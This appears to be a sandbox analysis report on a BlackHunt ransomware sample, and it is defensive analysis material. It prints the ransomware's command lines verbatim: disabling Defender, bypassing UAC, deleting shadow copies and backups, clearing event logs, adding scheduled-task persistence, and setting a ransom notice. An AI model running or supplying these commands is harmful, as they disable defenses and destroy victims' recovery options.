  PID 2208 wrote to memory of 2756  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  50
  PID 2208 wrote to memory of 2756  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  50
  PID 2208 wrote to memory of 2756  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  50
  PID 2208 wrote to memory of 2676  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  52
  PID 2208 wrote to memory of 2676  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  52
  PID 2208 wrote to memory of 2676  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  52
  PID 2208 wrote to memory of 2676  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  52
  PID 2208 wrote to memory of 2704  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  56
  PID 2208 wrote to memory of 2704  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  56
  PID 2208 wrote to memory of 2704  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  56
  PID 2208 wrote to memory of 2704  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  56
  PID 2604 wrote to memory of 2628  2604  conhost.exe                                                               54
  PID 2604 wrote to memory of 2628  2604  conhost.exe                                                               54
  PID 2604 wrote to memory of 2628  2604  conhost.exe                                                               54
  PID 2208 wrote to memory of 2024  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  135
  PID 2208 wrote to memory of 2024  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  135
  PID 2208 wrote to memory of 2024  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  135
  PID 2208 wrote to memory of 2024  2208  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe  135
System policy modification (1 TTPs, 3 IoCs)
  description      ioc                                                                                                  Process
  Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System                          7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"          7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"  7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes

[1] C:\Users\Admin\AppData\Local\Temp\7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe"
    PID: 2208
    - UAC bypass
    - Checks whether UAC is enabled
    - Enumerates connected drives
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - System policy modification

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
        PID: 1852
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
            PID: 2568
            - Modifies registry class

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        PID: 2964
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
            PID: 2672
            - Modifies registry class

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
        PID: 2804
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
            PID: 2560
            - Modifies registry class

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        PID: 2604

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
            PID: 2628
            - Modifies registry class

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
        PID: 2652

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
            PID: 1784
            - Adds Run key to start application

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
        PID: 2680

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
            PID: 1772

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
        PID: 2656

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
            PID: 1732

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
        PID: 2976

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
            PID: 2636

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
        PID: 2304

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
            PID: 1656

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
        PID: 2756

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
            PID: 1472

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
        PID: 2676

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
            PID: 1680

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
        PID: 2704

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
            PID: 1984

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
        PID: 2024

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
            PID: 1916

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
        PID: 2472

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
            PID: 1048

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
        PID: 2532

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
            PID: 2788

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
        PID: 2896

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
            PID: 284

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
        PID: 2900

        [3] C:\Windows\system32\reg.exe
            Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
            PID: 780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2912
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3064
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1588
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1968
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1872
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:952
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1688
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:3020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2120
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:820
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2016
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:944
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1484
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2700
-
-
-
  - C:\Windows\System32\cmd.exe (PID 2520): "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe" /F
    - C:\Windows\system32\schtasks.exe (PID 2720): SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe" /F  [Creates scheduled task(s)]
  - C:\Windows\System32\cmd.exe (PID 2124): "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
    - C:\Windows\system32\vssadmin.exe (PID 2400): vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB  [Enumerates connected drives; Interacts with shadow copies]
  - C:\Windows\System32\cmd.exe (PID 2148): "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
    - C:\Windows\system32\vssadmin.exe (PID 1100): vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded  [Enumerates connected drives; Interacts with shadow copies]
  - C:\Windows\System32\cmd.exe (PID 604): "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    - C:\Windows\system32\vssadmin.exe (PID 324): vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB  [Interacts with shadow copies]
  - C:\Windows\System32\cmd.exe (PID 472): "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
    - C:\Windows\system32\vssadmin.exe (PID 1184): vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded  [Interacts with shadow copies]
  - C:\Windows\System32\cmd.exe (PID 2444): "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
    - C:\Windows\system32\vssadmin.exe (PID 1836): vssadmin.exe Delete Shadows /all /quiet  [Interacts with shadow copies]
  - C:\Windows\System32\cmd.exe (PID 1652): "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
    - C:\Windows\system32\bcdedit.exe (PID 2948): bcdedit /set {default} recoveryenabled No  [Modifies boot configuration data using bcdedit]
  - C:\Windows\System32\cmd.exe (PID 1444): "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    - C:\Windows\system32\bcdedit.exe (PID 1276): bcdedit /set {default} bootstatuspolicy IgnoreAllFailures  [Modifies boot configuration data using bcdedit]
  - C:\Windows\System32\cmd.exe (PID 3056): "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
    - C:\Windows\system32\fsutil.exe (PID 1672): fsutil.exe usn deletejournal /D C:  [Deletes NTFS Change Journal]
  - C:\Windows\System32\cmd.exe (PID 852): "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
    - C:\Windows\system32\wbadmin.exe (PID 564): wbadmin.exe delete catalog -quiet  [Deletes backup catalog]
  - C:\Windows\System32\cmd.exe (PID 1040): "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    - C:\Windows\system32\schtasks.exe (PID 3140): schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  - C:\Windows\System32\cmd.exe (PID 2156): "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
    - C:\Windows\system32\fsutil.exe (PID 3292): fsutil usn deletejournal /D F:\  [Enumerates connected drives]
  - C:\Windows\System32\cmd.exe (PID 2752): "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
    - C:\Windows\system32\fsutil.exe (PID 4708): fsutil usn deletejournal /D C:\
  - C:\Windows\System32\cmd.exe (PID 1604): "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
    - C:\Windows\system32\fsutil.exe (PID 1816): fsutil usn deletejournal /D M:\  [Enumerates connected drives]
  - C:\Windows\System32\cmd.exe (PID 5860): "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
    - C:\Windows\system32\wevtutil.exe (PID 3864): wevtutil.exe cl Setup  [Clears Windows event logs; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\System32\cmd.exe (PID 3288): "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
    - C:\Windows\system32\wevtutil.exe (PID 1512): wevtutil.exe cl System  [Clears Windows event logs; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\System32\cmd.exe (PID 5636): "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
    - C:\Windows\system32\wevtutil.exe (PID 3596): wevtutil.exe cl Application  [Clears Windows event logs; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\System32\cmd.exe (PID 5672): "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
    - C:\Windows\system32\wevtutil.exe (PID 5420): wevtutil.exe cl Security  [Clears Windows event logs; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\System32\cmd.exe (PID 5492): "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
    - C:\Windows\system32\wevtutil.exe (PID 2632): wevtutil.exe cl Security /e:false  [Clears Windows event logs; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\System32\cmd.exe (PID 1580): "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
    - C:\Windows\system32\vssadmin.exe (PID 3856): vssadmin.exe Delete Shadows /all /quiet  [Interacts with shadow copies]
  - C:\Windows\System32\cmd.exe (PID 5916): "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
    - C:\Windows\system32\bcdedit.exe (PID 2760): bcdedit /set {default} recoveryenabled No  [Modifies boot configuration data using bcdedit]
  - C:\Windows\System32\cmd.exe (PID 956): "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    - C:\Windows\system32\bcdedit.exe (PID 3036): bcdedit /set {default} bootstatuspolicy IgnoreAllFailures  [Modifies boot configuration data using bcdedit]
  - C:\Windows\System32\cmd.exe (PID 4712): "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
    - C:\Windows\system32\wbadmin.exe (PID 908): wbadmin.exe delete catalog -quiet  [Deletes backup catalog]
  - C:\Windows\System32\cmd.exe (PID 2792): "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
    - C:\Windows\system32\fsutil.exe (PID 1208): fsutil.exe usn deletejournal /D C:  [Deletes NTFS Change Journal]
  - C:\Windows\System32\cmd.exe (PID 1480): "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
    - C:\Windows\system32\reg.exe (PID 1820): REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
  - C:\Windows\System32\cmd.exe (PID 1636): "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    - C:\Windows\system32\schtasks.exe (PID 2644): schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  - C:\Windows\System32\cmd.exe (PID 2652): "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
    - C:\Windows\system32\reg.exe (PID 4088): REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
  - C:\Windows\System32\cmd.exe (PID 1248): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
    - C:\Windows\system32\reg.exe (PID 644): reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
  - C:\Windows\System32\cmd.exe (PID 3228): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
    - C:\Windows\system32\reg.exe (PID 4080): reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
  - C:\Windows\System32\cmd.exe (PID 576): "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
    - C:\Windows\system32\schtasks.exe (PID 812): SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
  - C:\Windows\System32\cmd.exe (PID 5456): "C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
    - C:\Windows\system32\notepad.exe (PID 4172): notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
  - C:\Windows\System32\cmd.exe (PID 3940): "C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
    - C:\Windows\system32\taskkill.exe (PID 1644): taskkill /IM mshta.exe /f  [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\System32\cmd.exe (PID 3684): "C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
  - C:\Windows\SysWOW64\cmd.exe (PID 5620): "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe"  [Deletes itself]
    - C:\Windows\SysWOW64\PING.EXE (PID 4108): ping 127.0.0.1 -n 5  [Runs ping.exe]
- C:\Windows\system32\conhost.exe (PID 2604): \??\C:\Windows\system32\conhost.exe "459591140-2007753119-2012737616-170257679140130103420991735751285357023669571680"  [Suspicious use of WriteProcessMemory]
- C:\Windows\system32\vssvc.exe (PID 1732): C:\Windows\system32\vssvc.exe  [Modifies Windows Defender Real-time Protection settings; Suspicious use of AdjustPrivilegeToken]
- C:\Windows\system32\wbengine.exe (PID 3428): "C:\Windows\system32\wbengine.exe"  [Suspicious use of AdjustPrivilegeToken]
- C:\Windows\System32\vdsldr.exe (PID 1136): C:\Windows\System32\vdsldr.exe -Embedding
- C:\Windows\System32\vds.exe (PID 3356): C:\Windows\System32\vds.exe
Network
MITRE ATT&CK Enterprise v15
- Persistence
  - Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
  - Create or Modify System Process (1): Windows Service (1)
  - Scheduled Task/Job (1)
- Privilege Escalation
  - Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
  - Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
  - Create or Modify System Process (1): Windows Service (1)
  - Scheduled Task/Job (1)
- Defense Evasion
  - Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
  - Impair Defenses (2): Disable or Modify Tools (2)
  - Indicator Removal (4): File Deletion (3)
  - Modify Registry (5)
Downloads